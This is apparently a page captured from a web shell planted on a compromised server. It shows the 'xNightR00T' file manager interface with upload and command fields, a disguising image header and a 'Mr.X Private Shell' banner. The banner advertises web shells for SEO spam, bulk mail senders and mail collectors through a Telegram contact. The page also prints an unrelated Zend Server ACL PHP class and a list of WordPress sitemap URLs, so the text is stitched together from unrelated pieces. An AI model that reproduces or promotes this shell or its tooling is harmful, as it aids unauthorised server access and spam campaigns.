xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer\Permissions;

use Users\Identity;
use Zend\Permissions\Acl\Acl;
use Configuration\License\License;
use ZendServer\Log\Log;
use Configuration\License\LicenseAwareInterface;
use Zend\Authentication\AuthenticationService;

class AclQuery implements LicenseAwareInterface
{
    /**
     * @var License
     */
    private $license;

    /**
     * @var Acl
     */
    private $acl;

    /**
     *
     * @var AuthenticationService
     */
    private $authService;

    /**
     * @var Acl
     */
    private $editionAcl;

    /**
     * @var boolean
     */
    private $enabled = true;

    /**
     * @var string
     */
    private $overrideRole;

    /**
     * @param ResourceInterface|string $resource
     * @return boolean
     */
    public function hasResource($resource)
    {
        return $this->acl->hasResource($resource);
    }

    /**
     * @param string $resource
     * @param string $privilege
     */
    public function isAllowed($resource = null, $privilege = null)
    {
        if ($this->enabled) {
            return $this->isAllowedEdition($resource, $privilege) && $this->isAllowedIdentity($resource, $privilege);
        }
        return true;
    }

    /**
     * @param string $resource
     * @param string $privilege
     * @return boolean
     */
    public function isAllowedIdentity($resource = null, $privilege = null)
    {
        if ($this->enabled) {
            if (!$this->hasResource($resource)) {
                return false;
            }

            $licenseRole = $this->overrideRole ? $this->overrideRole : $this->getIdentity()->getRole();
            $result      = $this->acl->isAllowed($licenseRole, $resource, $privilege);
            Log::debug("Role assertion: isAllowed '{$licenseRole}', '$resource', '$privilege': ".($result ? 'true' : 'false'));
            return $result;
        }
        return true;
    }

    /**
     * @param string $resource
     * @param string $privilege
     * @return boolean
     */
    public function isAllowedEdition($resource = null, $privilege = null)
    {
        if ($this->enabled) {
            $licenseRole = strtoupper($this->license->getEdition());
            if ($this->editionAcl->hasResource($resource)) {
                $result = $this->editionAcl->isAllowed("edition:{$licenseRole}", $resource, $privilege);
                Log::debug("Edition assertion: isAllowed 'edition:{$licenseRole}', '$resource', '$privilege': ".($result
                            ? 'true' : 'false'));
                return $result;
            } else {
                return true;
            }
        }
        return true;
    }

    /**
     * @param Acl $acl
     * @return AclQuery
     */
    public function setAcl($acl)
    {
        $this->acl = $acl;
        return $this;
    }

    /**
     * @param AuthenticationService $authService
     * @return \ZendServer\Permissions\AclQuery
     */
    public function setAuthService($authService)
    {
        $this->authService = $authService;
        return $this;
    }

    /**
     * @return \Users\Identity
     */
    public function getIdentity()
    {
        if ($this->authService->hasIdentity()) {
            return $this->authService->getIdentity();
        }
        return new Identity('Unknown', 'guest');
    }
    /*
     * (non-PHPdoc)
     * @see \ZendServer\License\LicenseAwareInterface::setLicense()
     */

    public function setLicense(License $license)
    {
        $this->license = $license;
        return $this;
    }

    /**
     * @param Acl $acl
     * @return \ZendServer\Permissions\Assertion\Edition
     */
    public function setEditionAcl(Acl $acl)
    {
        $this->editionAcl = $acl;
        return $this;
    }

    /**
     * @param boolean $enabled
     * @return \ZendServer\Permissions\AclQuery
     */
    public function setEnabled($enabled = true)
    {
        $this->enabled = $enabled;
        return $this;
    }

    /**
     * @param string $overrideRole
     * @return \ZendServer\Permissions\AclQuery
     */
    public function setOverrideRole($overrideRole)
    {
        $this->overrideRole = $overrideRole;
        return $this;
    }
}

Filemanager

Name Type Size Permission Actions
Assertion Folder 0755
AclQuerierInterface.php File 236 B 0644
AclQuery.php File 4.09 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml